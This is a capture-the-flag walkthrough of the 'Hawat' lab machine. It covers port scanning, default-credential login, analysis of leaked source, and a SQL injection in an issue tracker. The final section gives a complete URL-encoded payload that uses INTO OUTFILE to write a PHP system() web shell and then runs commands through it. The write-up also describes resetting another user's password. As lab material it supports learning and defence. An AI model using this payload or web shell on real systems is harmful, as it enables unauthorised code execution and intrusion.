Hawat

Target IP: 192.168.171.147

Challenge Description: 1.21 GigHawats.


Reconnaissance

An initial nmap scan shows four open TCP ports on the target: 22, 17445, 30455 and 50080. The aggressive scan of those ports follows.

22/tcp    open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open  unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>Issue Tracker</title>
|     <link href="/css/bootstrap.min.css" rel="stylesheet" />
|     </head>
|     <body>
|     <section>
|     <div class="container mt-4">
|     <span>
|     <div>
|     <a href="/login" class="btn btn-primary" style="float:right">Sign In</a> 
|     <a href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
|     </div>
|     </span>
|     <br><br>
|     <table class="table">
|     <thead>
|     <tr>
|     <th>ID</th>
|     <th>Message</th>
|     <th>P
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
30455/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15

The output above comes from sudo nmap -sV -A 192.168.171.147 -p 22,17445,30455,50080. SSH is on port 22 and the other three ports serve HTTP. nmap could not name the service on 17445, but the probe responses settle it: the header set it returns (X-Content-Type-Options: nosniff, X-XSS-Protection: 1; mode=block, Cache-Control: no-cache, no-store, max-age=0, must-revalidate, Pragma: no-cache, Expires: 0, X-Frame-Options: DENY) is the default Spring Security header set, and the styled HTTP Status 400 page is Tomcat's, so this is a Java web application titled Issue Tracker running on an embedded Tomcat. nginx 1.18.0 on 30455 and Apache 2.4.46 with PHP 7.4.15 on 50080 both serve W3.CSS template pages; nmap also flags TRACE as enabled on the Apache instance, which is a minor finding (cross-site tracing) on its own.


Enumeration

Port 17445: HTTP
Browsing to this port shows the Issue Tracker front page seen in the nmap output: a table of issues with Sign In and Register buttons. It is some sort of issue tracking application.

I registered a new user with the credentials test:test. Logged in as that user, I can list the other users of the application; the one that stands out is clinton. Using the Edit button I changed clinton's password to test (that any registered user can reset another account's password is a broken-access-control finding in its own right), but it did not get me anything useful here. A directory search against this application turned up only /login and /register.

Port 50080: HTTP
This port serves the W3.CSS template page that nmap reported as the http-title.

A directory search against this application turns up /cloud, which sounds interesting.

Browsing to /cloud returns a login page, and I have not found any credentials so far.

The default credentials admin:admin work. After logging in as admin I can browse files stored on the target, among them issuetracker.zip.

Opening issuetracker.zip in the file browser lists its contents. I also tried uploading a PHP web shell through this file manager, but I could not reach it over the web, so it is time to enumerate harder: I downloaded issuetracker.zip to my machine.

Running tree on the extracted archive shows the source tree of a Java application, with a few source files worth reading.

After some digging, the source of IssueController turns out to hold the interesting bits. It contains hard-coded credentials, which may come in useful after exploitation, and the handler mapped to /issue/checkByPriority appears to build its SQL directly from the priority request parameter rather than binding it, so that parameter is injectable. Having the source is what makes this finding cheap: without it, the endpoint and the parameter would have had to be guessed or fuzzed.
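As an added illustration (not code from this write-up or from the Hawat issue tracker), the query pattern behind such a finding, in Python against an in-memory SQLite table, so the effect of an injected priority value can be seen without the target. The schema, table names and rows are constructed; the real application is Java and its query text is not reproduced here, only the pattern. SQLite has no INTO OUTFILE, so the injected UNION reads a second table instead of writing a file:

```python
from __future__ import annotations

import sqlite3

# Constructed sample rows, not data from the target.
SAMPLE_ISSUES = [
    (1, "Login page returns 500", "Normal"),
    (2, "Typo on the landing page", "Low"),
    (3, "Payroll export exposes salaries", "High"),
]
SAMPLE_USERS = [
    ("clinton", "constructed-hash-1"),
    ("test", "constructed-hash-2"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the tracker's database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE issue (id INTEGER, message TEXT, priority TEXT)")
    conn.execute("CREATE TABLE app_user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO issue VALUES (?, ?, ?)", SAMPLE_ISSUES)
    conn.executemany("INSERT INTO app_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def check_by_priority_vulnerable(conn: sqlite3.Connection, priority: str) -> list[str]:
    """The bug class behind /issue/checkByPriority: the request parameter is
    pasted into the SQL text, so a quote inside it ends the string literal and
    whatever follows is parsed as SQL."""
    sql = f"SELECT message FROM issue WHERE priority = '{priority}'"
    return [row[0] for row in conn.execute(sql)]


def check_by_priority_fixed(conn: sqlite3.Connection, priority: str) -> list[str]:
    """Hardened form: the value is bound as a parameter and can only ever be
    compared with the priority column, never interpreted as SQL."""
    sql = "SELECT message FROM issue WHERE priority = ?"
    return [row[0] for row in conn.execute(sql, (priority,))]


# Same shape as the write-up's payload: close the literal, UNION exactly one
# column (the original query selects one column, so the UNION must too), and
# comment out the closing quote the application appends.
INJECTION = "Normal' UNION SELECT username || ':' || password FROM app_user -- "


def demo() -> tuple[list[str], list[str]]:
    """Run the same injected value through both versions of the query."""
    conn = make_db()
    return (check_by_priority_vulnerable(conn, INJECTION),
            check_by_priority_fixed(conn, INJECTION))


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)  # the Normal issue plus every app_user row
    print("fixed:     ", safe)    # [] because no issue has that literal priority
```

The fixed version returns nothing for the injected value because the whole string, quote and all, is compared against the priority column; the vulnerable version returns the Normal issue plus every credential row from the second table.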


Exploitation & Flag

To turn the injection into code execution I write a PHP web shell into the web root with MySQL/MariaDB's INTO OUTFILE. The payload, before URL encoding, is Normal' UNION SELECT "<?php echo system($_GET['cmd']);" INTO OUTFILE '/srv/http/cmd.php'; -- (with a trailing space after the --). Read left to right: the single quote closes the string literal, UNION SELECT appends one column holding the PHP source, INTO OUTFILE makes the database server write that row to /srv/http/cmd.php, and the trailing -- comments out the closing quote the application appends. The trailing space matters, because MySQL only treats -- as a comment when whitespace follows it. This only works if the database user has the FILE privilege, secure_file_priv does not restrict the path, the database server runs on the same host as the web server and can write to its document root, and the file does not already exist, since INTO OUTFILE never overwrites.

URL-encoded, the request becomes
http://192.168.171.147:30455/issue/checkByPriority?priority=Normal%27%20UNION%20SELECT%20%22%3C%3Fphp%20echo%20system%28%24_GET%5B%27cmd%27%5D%29%3B%22%20INTO%20OUTFILE%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B%20--%20
which I sent with the POST method. The /issue/checkByPriority mapping belongs to the issue tracker application that nmap found on port 17445; if a request to port 30455 is not forwarded to that application, send the same request to port 17445 instead.

The web shell is now reachable at http://192.168.171.147:30455/cmd.php and runs whatever is passed in the cmd parameter, for example ?cmd=id.

Reading proof.txt through the web shell gives the flag. GG.